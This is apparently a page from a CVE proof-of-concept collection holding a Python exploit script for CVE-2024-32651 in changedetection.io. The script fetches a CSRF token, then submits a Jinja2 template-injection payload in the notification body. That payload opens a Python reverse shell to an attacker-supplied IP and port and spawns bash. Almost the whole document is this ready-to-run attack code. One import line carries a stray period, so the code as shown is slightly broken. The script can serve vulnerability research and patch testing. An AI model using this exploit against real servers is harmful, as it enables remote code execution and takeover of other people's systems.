4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE-2024-32651.py PY
# Exploit Title: changedetection <= 0.45.20 Remote Code Execution (RCE)
# Date: 9-16-2024
# Exploit Author: Aditya Watal (s0ck3t) 
# Vendor Homepage: changedetection.io
# Software Link: https://github.com/dgtlmoon/changedetection.io
# Version: <= 0.45.20
# Tested on: Linux
# CVE : CVE-2024-32651
# Credits: This fixed version of the exploit was based on an original exploit
# published by Zach Crosman (zcrosman) with EDB-ID: 52027. You can view the
# original exploit here: https://www.exploit-db.com/exploits/52027.

import requests
from bs4 import BeautifulSoup
import argparse.
import sys
import logging

# Setup logging
logging.basicConfig(level=logging.DEBUG, format='%(asctime)s - %(levelname)s - %(message)s')

def fetch_csrf_token(session, base_url):
    """
    Fetches the CSRF token from the base URL.

    Args:
        session (requests.Session): The session object used for HTTP requests.
        base_url (str): The base URL of the application.

    Returns:
        str: The CSRF token.
    """
    try:
        logging.debug(f"Fetching CSRF token from {base_url}")
        response = session.get(base_url, timeout=10)  # Added timeout for blocking issues
        response.raise_for_status()
        soup = BeautifulSoup(response.text, 'html.parser')
        csrf_token = soup.find('input', {'name': 'csrf_token'})['value']
        logging.info(f'Obtained CSRF token: {csrf_token}')
        return csrf_token
    except requests.RequestException as e:
        logging.error(f'Error fetching CSRF token: {e}')
        sys.exit(1)

def submit_initial_form(session, csrf_token, base_url):
    """
    Submits the initial form to add a quick watch.

    Args:
        session (requests.Session): The session object used for HTTP requests.
        csrf_token (str): The CSRF token obtained from the base URL.
        base_url (str): The base URL of the application.

    Returns:
        str: The redirect URL.
    """
    add_url = f"{base_url}/form/add/quickwatch"
    add_url_headers = {
        "Origin": base_url,
        "Content-Type": "application/x-www-form-urlencoded"
    }
    add_url_data = {
        "csrf_token": csrf_token,
        "url": "https://init5.duckdns.org",
        "tags": '',
        "edit_and_watch_submit_button": "Edit > Watch",
        "processor": "text_json_diff"
    }

    try:
        logging.debug(f"Submitting initial form to {add_url}")
        post_response = session.post(add_url, headers=add_url_headers, data=add_url_data, allow_redirects=False, timeout=10)
        post_response.raise_for_status()
        if 'Location' in post_response.headers:
            redirect_url = post_response.headers['Location']
            logging.info(f'Redirect URL: {redirect_url}')
            return redirect_url
        else:
            logging.error('No redirect URL found')
            sys.exit(1)
    except requests.RequestException as e:
        logging.error(f'Error submitting initial form: {e}')
        sys.exit(1)

def send_payload(session, redirect_url, csrf_token, base_url, listen_ip, listen_port, notification_url):
    """
    Sends the payload with SSTI to trigger the remote code execution.

    Args:
        session (requests.Session): The session object used for HTTP requests.
        redirect_url (str): The URL to redirect to after initial form submission.
        csrf_token (str): The CSRF token obtained from the base URL.
        base_url (str): The base URL of the application.
        listen_ip (str): The IP address where Netcat is listening.
        listen_port (int): The port where Netcat is listening.
        notification_url (str): The notification URL to use, if provided.
    """
    save_detection_url = f"{base_url}{redirect_url}"
    save_detection_headers = {
        "Referer": redirect_url,
        "Cookie": f"session={session.cookies.get('session')}"
    }

    save_detection_data = {
        "csrf_token": csrf_token,
        "url": "https://reddit.com/r/all",
        "title": '',
        "tags": '',
        "time_between_check-weeks": '',
        "time_between_check-days": '',
        "time_between_check-hours": '',
        "time_between_check-minutes": '',
        "time_between_check-seconds": '30',
        "filter_failure_notification_send": 'y',
        "fetch_backend": 'system',
        "webdriver_delay": '',
        "webdriver_js_execute_code": '',
        "method": 'GET',
        "headers": '',
        "body": '',
        "notification_urls": notification_url,
        "notification_title": '',
        "notification_body": f"""
        {{% for x in ().__class__.__base__.__subclasses__() %}}
        {{% if "warning" in x.__name__ %}}
         {{{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\\"{listen_ip}\\",{listen_port}));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\\"/bin/bash\\")'").read()}}}}
        {{% endif %}}
        {{% endfor %}}
        """,
        "notification_format": 'System default',
        "include_filters": '',
        "subtractive_selectors": '',
        "filter_text_added": 'y',
        "filter_text_replaced": 'y',
        "filter_text_removed": 'y',
        "trigger_text": '',
        "ignore_text": '',
        "text_should_not_be_present": '',
        "extract_text": '',
        "save_button": 'Save'
    }

    try:
        logging.debug(f"Sending payload to {save_detection_url}")
        final_response = session.post(save_detection_url, headers=save_detection_headers, data=save_detection_data, timeout=10)
        final_response.raise_for_status()
        logging.info('Payload sent successfully.')
    except requests.RequestException as e:
        logging.error(f'Error sending payload: {e}')
        sys.exit(1)

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='Add detection without starting listener')
    parser.add_argument('--url', type=str, required=True, help='Base URL of the target site')
    parser.add_argument('--port', type=int, required=True, help='Port for the listener')
    parser.add_argument('--ip', type=str, required=True, help='IP address for the listener')
    parser.add_argument('--notification', type=str, help='Notification URL if you don\'t want to use the system default')
    args = parser.parse_args()

    try:
        session = requests.Session()
        csrf_token = fetch_csrf_token(session, args.url)
        redirect_url = submit_initial_form(session, csrf_token, args.url)
        send_payload(session, redirect_url, csrf_token, args.url, args.ip, args.port, args.notification)
    finally:
        logging.info('Script execution completed. Check netcat for reverse shell...... ')
        sys.exit(0)